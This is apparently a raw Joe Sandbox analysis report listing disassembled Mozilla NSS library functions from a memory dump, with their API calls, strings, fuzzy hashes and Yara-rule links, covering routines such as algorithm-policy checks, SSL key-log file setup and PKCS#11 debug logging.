PR_SetError.NSS3(FFFFE001,00000000,?,?,?,?,00000002,00000000,?,6C7B5989), ref: 6C7D0767

Strings

NSS_ALLOW_WEAK_SIGNATURE_ALG, xrefs: 6C7D056C
flags, xrefs: 6C7D0555
NSS_HASH_ALG_SUPPORT, xrefs: 6C7D05B2
dynamic OID data, xrefs: 6C7D068A
V, xrefs: 6C7D0559

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: HashTable$SecureUtil$Arena_CriticalEnterErrorSectionStrdup_UnlockValuefreegetenvstrchrstrstr
String ID: NSS_ALLOW_WEAK_SIGNATURE_ALG$NSS_HASH_ALG_SUPPORT$V$dynamic OID data$flags
API String ID: 514890423-4248967104
Opcode ID: aabdd0d87055812123c451032ba6f7944c32fbbe46ee4f5a022410f708d5063c
Instruction ID: 60da46124da621556b929d2995d023b4ad2174e58f19ac2c187c2b36f5ab3c5d
Opcode Fuzzy Hash: aabdd0d87055812123c451032ba6f7944c32fbbe46ee4f5a022410f708d5063c
Instruction Fuzzy Hash: 1151D3B1E002815FEB608B358E0CB5B3AB5AB8235CF5A1535E818D7B41E735F945CBE1

Function 6C7B4C20 Relevance: 30.3, APIs: 20, Instructions: 290memoryCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6C7B4C4C
EnterCriticalSection.KERNEL32(?), ref: 6C7B4C60
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6C7B4CA1
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 6C7B4CBE
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 6C7B4CD2
realloc.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C7B4D3A
PORT_Alloc_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C7B4D4F
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6C7B4DB7

Part of subcall function 6C81DD70: TlsGetValue.KERNEL32 ref: 6C81DD8C
Part of subcall function 6C81DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C81DDB4

Part of subcall function 6C7607A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C6F204A), ref: 6C7607AD
Part of subcall function 6C7607A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C6F204A), ref: 6C7607CD
Part of subcall function 6C7607A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C6F204A), ref: 6C7607D6
Part of subcall function 6C7607A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C6F204A), ref: 6C7607E4
Part of subcall function 6C7607A0: TlsSetValue.KERNEL32(00000000,?,6C6F204A), ref: 6C760864
Part of subcall function 6C7607A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C760880
Part of subcall function 6C7607A0: TlsSetValue.KERNEL32(00000000,?,?,6C6F204A), ref: 6C7608CB
Part of subcall function 6C7607A0: TlsGetValue.KERNEL32(?,?,6C6F204A), ref: 6C7608D7
Part of subcall function 6C7607A0: TlsGetValue.KERNEL32(?,?,6C6F204A), ref: 6C7608FB

TlsGetValue.KERNEL32 ref: 6C7B4DD7
EnterCriticalSection.KERNEL32(?), ref: 6C7B4DEC
PR_Unlock.NSS3(?), ref: 6C7B4E1B
PR_SetError.NSS3(00000000,00000000), ref: 6C7B4E2F
PR_SetError.NSS3(FFFFE013,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C7B4E5A
PR_SetError.NSS3(00000000,00000000), ref: 6C7B4E71
free.MOZGLUE(00000000), ref: 6C7B4E7A
PR_Unlock.NSS3(?), ref: 6C7B4EA2
TlsGetValue.KERNEL32 ref: 6C7B4EC1
EnterCriticalSection.KERNEL32(?), ref: 6C7B4ED6
PR_Unlock.NSS3(?), ref: 6C7B4F01
free.MOZGLUE(00000000), ref: 6C7B4F2A

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Value$CriticalSectionUnlock$Enter$Error$callocfree$Alloc_LeaveUtilrealloc
String ID:
API String ID: 759471828-0
Opcode ID: 727d5017a638ecbcd4dc0aa8c2e5125a54fd124a8c102f563fc562ac0f20192d
Instruction ID: ec8c7df82bcf2f38596656dbe0212dcb29dc24278eb7d74379cc5a056d0e82e0
Opcode Fuzzy Hash: 727d5017a638ecbcd4dc0aa8c2e5125a54fd124a8c102f563fc562ac0f20192d
Instruction Fuzzy Hash: 75B1D075A00206AFDB11EF68D985BAA77B8BF4531CF044138ED15A7B01EB34EA64CBD1

Function 6C806E90 Relevance: 30.1, APIs: 11, Strings: 6, Instructions: 305fileCOMMON

Download Yara Rule

APIs

PR_GetEnvSecure.NSS3(SSLKEYLOGFILE,?,6C806BF7), ref: 6C806EB6

Part of subcall function 6C761240: TlsGetValue.KERNEL32(00000040,?,6C76116C,NSPR_LOG_MODULES), ref: 6C761267
Part of subcall function 6C761240: EnterCriticalSection.KERNEL32(?,?,?,6C76116C,NSPR_LOG_MODULES), ref: 6C76127C
Part of subcall function 6C761240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6C76116C,NSPR_LOG_MODULES), ref: 6C761291
Part of subcall function 6C761240: PR_Unlock.NSS3(?,?,?,?,6C76116C,NSPR_LOG_MODULES), ref: 6C7612A0

fopen.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,6C8AFC0A,6C806BF7), ref: 6C806ECD
ftell.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6C806EE0
fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(# SSL/TLS secrets log file, generated by NSS,0000002D,00000001), ref: 6C806EFC
PR_NewLock.NSS3 ref: 6C806F04
fclose.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C806F18
PR_GetEnvSecure.NSS3(SSLFORCELOCKS,6C806BF7), ref: 6C806F30
PR_GetEnvSecure.NSS3(NSS_SSL_ENABLE_RENEGOTIATION,?,6C806BF7), ref: 6C806F54
PR_GetEnvSecure.NSS3(NSS_SSL_REQUIRE_SAFE_NEGOTIATION,?,?,6C806BF7), ref: 6C806FE0
PR_GetEnvSecure.NSS3(NSS_SSL_CBC_RANDOM_IV,?,?,?,6C806BF7), ref: 6C806FFD

Strings

NSS_SSL_CBC_RANDOM_IV, xrefs: 6C806FF8
SSLFORCELOCKS, xrefs: 6C806F2B
NSS_SSL_REQUIRE_SAFE_NEGOTIATION, xrefs: 6C806FDB
NSS_SSL_ENABLE_RENEGOTIATION, xrefs: 6C806F4F
SSLKEYLOGFILE, xrefs: 6C806EB1
# SSL/TLS secrets log file, generated by NSS, xrefs: 6C806EF7

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Secure$CriticalEnterLockSectionUnlockValuefclosefopenftellfwritegetenv
String ID: # SSL/TLS secrets log file, generated by NSS$NSS_SSL_CBC_RANDOM_IV$NSS_SSL_ENABLE_RENEGOTIATION$NSS_SSL_REQUIRE_SAFE_NEGOTIATION$SSLFORCELOCKS$SSLKEYLOGFILE
API String ID: 412497378-2352201381
Opcode ID: de70a6bfc51a93dd1f2812c1bbbb3a573537c33acf5a0ac78d420706abcbd2d2
Instruction ID: 2100a8395ec26f823698cc0c8035fa9a7991e1eb2029b430a1e4ea75bcb78974
Opcode Fuzzy Hash: de70a6bfc51a93dd1f2812c1bbbb3a573537c33acf5a0ac78d420706abcbd2d2
Instruction Fuzzy Hash: D6A1C5B2B559958AF6304A3CCE0174437A2AB9332EF994B79EC31C7ED5DB75A480C381

Function 6C77C4B0 Relevance: 30.0, APIs: 16, Strings: 1, Instructions: 247COMMON

Download Yara Rule

APIs

SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C77C4D5

Part of subcall function 6C7CBE30: SECOID_FindOID_Util.NSS3(6C78311B,00000000,?,6C78311B,?), ref: 6C7CBE44

NSS_GetAlgorithmPolicy.NSS3(?,?), ref: 6C77C516
NSS_GetAlgorithmPolicy.NSS3(?,?), ref: 6C77C530
SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C77C54E
NSS_GetAlgorithmPolicy.NSS3(00000000,00000000), ref: 6C77C5CB
VFY_VerifyDataWithAlgorithmID.NSS3(00000002,?,?,?,?,?,?), ref: 6C77C712
NSS_GetAlgorithmPolicy.NSS3(?,?), ref: 6C77C725
PR_SetError.NSS3(FFFFE006,00000000), ref: 6C77C742
PR_SetError.NSS3(FFFFE89D,00000000), ref: 6C77C751
PL_FinishArenaPool.NSS3(?), ref: 6C77C77A
NSS_GetAlgorithmPolicy.NSS3(?,00000000), ref: 6C77C78F
NSS_GetAlgorithmPolicy.NSS3(?,00000000), ref: 6C77C7A9

Strings

security, xrefs: 6C77C63F

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Algorithm$Policy$Util$ErrorTag_$ArenaDataFindFinishPoolVerifyWith
String ID: security
API String ID: 1085474831-3315324353
Opcode ID: 86c09be6954337174a3e340e01cbeeb3b045002e9cfebae42d6ecbe0af56f21f
Instruction ID: f54d8579962d999c1059e9b9a3cc84a05252c6c9bccc17487e677c1d1d768453
Opcode Fuzzy Hash: 86c09be6954337174a3e340e01cbeeb3b045002e9cfebae42d6ecbe0af56f21f
Instruction Fuzzy Hash: D9811B71D0110C9BEF20EA64DE84BEE7B68EF0930EF244135E901E6A51E721EA49C7B1

Function 6C7A6D60 Relevance: 29.9, APIs: 9, Strings: 8, Instructions: 119COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_Digest), ref: 6C7A6D86
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C7A6DB4
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C7A6DC3

Part of subcall function 6C88D930: PL_strncpyz.NSS3(?,?,?), ref: 6C88D963

PR_LogPrint.NSS3(?,00000000), ref: 6C7A6DD9
PR_LogPrint.NSS3( pData = 0x%p,?), ref: 6C7A6DFA
PR_LogPrint.NSS3( ulDataLen = %d,?), ref: 6C7A6E13
PR_LogPrint.NSS3( pDigest = 0x%p,?), ref: 6C7A6E2C
PR_LogPrint.NSS3( pulDigestLen = 0x%p,?), ref: 6C7A6E47
PR_LogPrint.NSS3( *pulDigestLen = 0x%x,?), ref: 6C7A6EB9

Strings

pDigest = 0x%p, xrefs: 6C7A6E27
(CK_INVALID_HANDLE), xrefs: 6C7A6DBC
*pulDigestLen = 0x%x, xrefs: 6C7A6EB4
hSession = 0x%x, xrefs: 6C7A6D9E, 6C7A6DAE
ulDataLen = %d, xrefs: 6C7A6E0E
pData = 0x%p, xrefs: 6C7A6DF5
pulDigestLen = 0x%p, xrefs: 6C7A6E42
C_Digest, xrefs: 6C7A6D81

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: *pulDigestLen = 0x%x$ hSession = 0x%x$ pData = 0x%p$ pDigest = 0x%p$ pulDigestLen = 0x%p$ ulDataLen = %d$ (CK_INVALID_HANDLE)$C_Digest
API String ID: 1003633598-2270781106
Opcode ID: 0a9e4bfae70bcf7576688a364846de853f0c7554f643a8b0347692bd420e4816
Instruction ID: 4b8b6d630c5735da1ae984678c3cb089b11eae055e7dfc3aab8727baa0e00550
Opcode Fuzzy Hash: 0a9e4bfae70bcf7576688a364846de853f0c7554f643a8b0347692bd420e4816
Instruction Fuzzy Hash: AB41E235602014ABDB209F98CE4DA9A7BB5AB8671CF048474E80897B12DB34BD09CBD1

Function 6C7A8500 Relevance: 29.9, APIs: 9, Strings: 8, Instructions: 119COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_DecryptDigestUpdate), ref: 6C7A8526
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C7A8554
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C7A8563

Part of subcall function 6C88D930: PL_strncpyz.NSS3(?,?,?), ref: 6C88D963

PR_LogPrint.NSS3(?,00000000), ref: 6C7A8579
PR_LogPrint.NSS3( pEncryptedPart = 0x%p,?), ref: 6C7A859A
PR_LogPrint.NSS3( ulEncryptedPartLen = %d,?), ref: 6C7A85B3
PR_LogPrint.NSS3( pPart = 0x%p,?), ref: 6C7A85CC
PR_LogPrint.NSS3( pulPartLen = 0x%p,?), ref: 6C7A85E7
PR_LogPrint.NSS3( *pulPartLen = 0x%x,?), ref: 6C7A8659

Strings

pulPartLen = 0x%p, xrefs: 6C7A85E2
pPart = 0x%p, xrefs: 6C7A85C7
ulEncryptedPartLen = %d, xrefs: 6C7A85AE
C_DecryptDigestUpdate, xrefs: 6C7A8521
(CK_INVALID_HANDLE), xrefs: 6C7A855C
hSession = 0x%x, xrefs: 6C7A853E, 6C7A854E
*pulPartLen = 0x%x, xrefs: 6C7A8654
pEncryptedPart = 0x%p, xrefs: 6C7A8595

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: *pulPartLen = 0x%x$ hSession = 0x%x$ pEncryptedPart = 0x%p$ pPart = 0x%p$ pulPartLen = 0x%p$ ulEncryptedPartLen = %d$ (CK_INVALID_HANDLE)$C_DecryptDigestUpdate
API String ID: 1003633598-1019776760
Opcode ID: 77f0cf06ae8cdba5df9aeb35a04d4f28a525871b95453287b0b39b95cfc22d03
Instruction ID: c1e1b503c23eb2c70944d08d7f1a5e97818ccb06dcb987a5b611766732b82bf4
Opcode Fuzzy Hash: 77f0cf06ae8cdba5df9aeb35a04d4f28a525871b95453287b0b39b95cfc22d03
Instruction Fuzzy Hash: B841D335602054AFDB208F98DF4CE9A7BB1AB4631DF088576E80857B12DB34BD49CBD1

Function 6C7A8690 Relevance: 29.9, APIs: 9, Strings: 8, Instructions: 119COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_SignEncryptUpdate), ref: 6C7A86B6
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C7A86E4
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C7A86F3

Part of subcall function 6C88D930: PL_strncpyz.NSS3(?,?,?), ref: 6C88D963

PR_LogPrint.NSS3(?,00000000), ref: 6C7A8709
PR_LogPrint.NSS3( pPart = 0x%p,?), ref: 6C7A872A
PR_LogPrint.NSS3( ulPartLen = %d,?), ref: 6C7A8743
PR_LogPrint.NSS3( pEncryptedPart = 0x%p,?), ref: 6C7A875C
PR_LogPrint.NSS3( pulEncryptedPartLen = 0x%p,?), ref: 6C7A8777
PR_LogPrint.NSS3( *pulEncryptedPartLen = 0x%x,?), ref: 6C7A87E9

Strings

pPart = 0x%p, xrefs: 6C7A8725
*pulEncryptedPartLen = 0x%x, xrefs: 6C7A87E4
(CK_INVALID_HANDLE), xrefs: 6C7A86EC
hSession = 0x%x, xrefs: 6C7A86CE, 6C7A86DE
ulPartLen = %d, xrefs: 6C7A873E
pEncryptedPart = 0x%p, xrefs: 6C7A8757
C_SignEncryptUpdate, xrefs: 6C7A86B1
pulEncryptedPartLen = 0x%p, xrefs: 6C7A8772

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: *pulEncryptedPartLen = 0x%x$ hSession = 0x%x$ pEncryptedPart = 0x%p$ pPart = 0x%p$ pulEncryptedPartLen = 0x%p$ ulPartLen = %d$ (CK_INVALID_HANDLE)$C_SignEncryptUpdate
API String ID: 1003633598-3528238837
Opcode ID: 285858ddd4c5d7e621541a0d78e846aea430fda9837860ac7c78e24cf3f1ca32
Instruction ID: 85ed7d80cbe92a0cc290df2b1b3f9e86ac95a01480482549fbe7089b830efa9a
Opcode Fuzzy Hash: 285858ddd4c5d7e621541a0d78e846aea430fda9837860ac7c78e24cf3f1ca32
Instruction Fuzzy Hash: 6641A635602154ABDB308FA8DF4CE9A77B1AB4631DF048575E80857B12D734BC59CBE1

Function 6C7E4500 Relevance: 28.8, APIs: 19, Instructions: 319threadCOMMON

Download Yara Rule

APIs

SECOID_FindOID_Util.NSS3(6C7E3803,?,6C7E3817,00000000), ref: 6C7E450E

Part of subcall function 6C7D07B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6C778298,?,?,?,6C76FCE5,?), ref: 6C7D07BF
Part of subcall function 6C7D07B0: PL_HashTableLookup.NSS3(?,?), ref: 6C7D07E6
Part of subcall function 6C7D07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C7D081B
Part of subcall function 6C7D07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C7D0825

PR_SetError.NSS3(FFFFE005,00000000,?,6C7E3817,00000000), ref: 6C7E4550
SECOID_FindOIDByTag_Util.NSS3(00000004,00000000), ref: 6C7E45B5
SECOID_FindOIDByTag_Util.NSS3(000000BF,00000000), ref: 6C7E4709
SECOID_GetAlgorithmTag_Util.NSS3(?,00000000), ref: 6C7E4727
SECOID_GetAlgorithmTag_Util.NSS3(?,?,00000000), ref: 6C7E473B
PORT_NewArena_Util.NSS3(00000400,?,?,?,?,?,?,?,00000000), ref: 6C7E4801
SEC_ASN1EncodeItem_Util.NSS3(00000000,?,?,6C8A2DA0,?,?,?,?,?,?,?,?,00000000), ref: 6C7E482E
PR_GetCurrentThread.NSS3 ref: 6C7E48F3
PR_SetError.NSS3(FFFFE02F,00000000), ref: 6C7E4923
PR_SetError.NSS3(FFFFE02F,00000000), ref: 6C7E4937
SECKEY_DestroyPublicKey.NSS3(?,?,?,00000000), ref: 6C7E494E
PR_SetError.NSS3(FFFFE02F,00000000,?,?,?,00000000), ref: 6C7E4963
PORT_FreeArena_Util.NSS3(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C7E4984
VFY_VerifyDataWithAlgorithmID.NSS3(?,?,?,6C7E21C2,?,?,?), ref: 6C7E499C
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C7E49B5
SECKEY_DestroyPublicKey.NSS3(?,?,?,?,?,00000000), ref: 6C7E49C5
PR_SetError.NSS3(FFFFE00A,00000000), ref: 6C7E49DC
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C7E49E9

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Util$Error$Arena_Tag_$AlgorithmFindFree$DestroyHashLookupPublicTable$ConstCurrentDataEncodeItem_ThreadVerifyWith
String ID:
API String ID: 3698863438-0
Opcode ID: 5b51ec99b1654c588e273dbf3bed6f5c7503c90d94eb5d767cb795779561aae4
Instruction ID: 1fa70b9e9cda329c3a4f9a87f9e853bd2274e8291b36a9917c8b4555994b152c
Opcode Fuzzy Hash: 5b51ec99b1654c588e273dbf3bed6f5c7503c90d94eb5d767cb795779561aae4
Instruction Fuzzy Hash: 70A1E7B7E01204ABEF108AE9DE84BAE7B65AB4D31CF244135E905B7B81E731D844D7A1

Function 6C7C8E40 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 198stringmemoryCOMMON

Download Yara Rule

APIs

memchr.VCRUNTIME140(abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_,00000000,00000041,6C7C8E01,00000000,6C7C9060,6C8D0B64), ref: 6C7C8E7B
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,6C7C8E01,00000000,6C7C9060,6C8D0B64), ref: 6C7C8E9E
PORT_ArenaAlloc_Util.NSS3(6C8D0B64,00000001,?,?,?,?,6C7C8E01,00000000,6C7C9060,6C8D0B64), ref: 6C7C8EAD
memcpy.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,?,?,6C7C8E01,00000000,6C7C9060,6C8D0B64), ref: 6C7C8EC3
strlen.API-MS-WIN-CRT-STRING-L1-1-0(5D8B5657,?,?,?,?,?,?,?,?,?,6C7C8E01,00000000,6C7C9060,6C8D0B64), ref: 6C7C8ED8
PORT_ArenaAlloc_Util.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,6C7C8E01,00000000,6C7C9060,6C8D0B64), ref: 6C7C8EE5
memcpy.VCRUNTIME140(00000000,5D8B5657,00000001,?,?,?,?,?,?,?,?,?,?,?,?,6C7C8E01), ref: 6C7C8EFB
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6C8D0B64,6C8D0B64), ref: 6C7C8F11
PORT_ArenaGrow_Util.NSS3(?,5D8B5657,643D8B08), ref: 6C7C8F3F

Part of subcall function 6C7CA110: PORT_ArenaGrow_Util.NSS3(8514C483,EB2074C0,184D8B3E,?,00000000,00000000,00000000,FFFFFFFF,?,6C7CA421,00000000,00000000,6C7C9826), ref: 6C7CA136

PR_SetError.NSS3(FFFFE013,00000000), ref: 6C7C904A

Strings

abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_, xrefs: 6C7C8E76

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: ArenaUtil$Alloc_Grow_memcpystrlen$Errormemchrstrcmp
String ID: abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_
API String ID: 977052965-1032500510
Opcode ID: d0a68b3237fe275601ed312b001ca322e26939ea0db2aa6a69984eaa2fbd7d29
Instruction ID: 82b4ae10bf9c99f21efd98fc06fcf75ea4ec588cc5fd836be3b493d95f4a80cc
Opcode Fuzzy Hash: d0a68b3237fe275601ed312b001ca322e26939ea0db2aa6a69984eaa2fbd7d29
Instruction Fuzzy Hash: F161ACB5E0120AAFDB10CF55CE80AABB7B9EF94358F144538DC18A7B00E731E955CBA1

Function 6C778E00 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 193memoryCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C778E5B
PR_SetError.NSS3(FFFFE007,00000000), ref: 6C778E81
PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6C778EED
SEC_QuickDERDecodeItem_Util.NSS3(?,?,6C8A18D0,?), ref: 6C778F03
PR_CallOnce.NSS3(6C8D2AA4,6C7D12D0), ref: 6C778F19
PL_FreeArenaPool.NSS3(?), ref: 6C778F2B
PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6C778F53
memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6C778F65
PL_FinishArenaPool.NSS3(?), ref: 6C778FA1
SECITEM_DupItem_Util.NSS3(?), ref: 6C778FFE
PR_CallOnce.NSS3(6C8D2AA4,6C7D12D0), ref: 6C779012
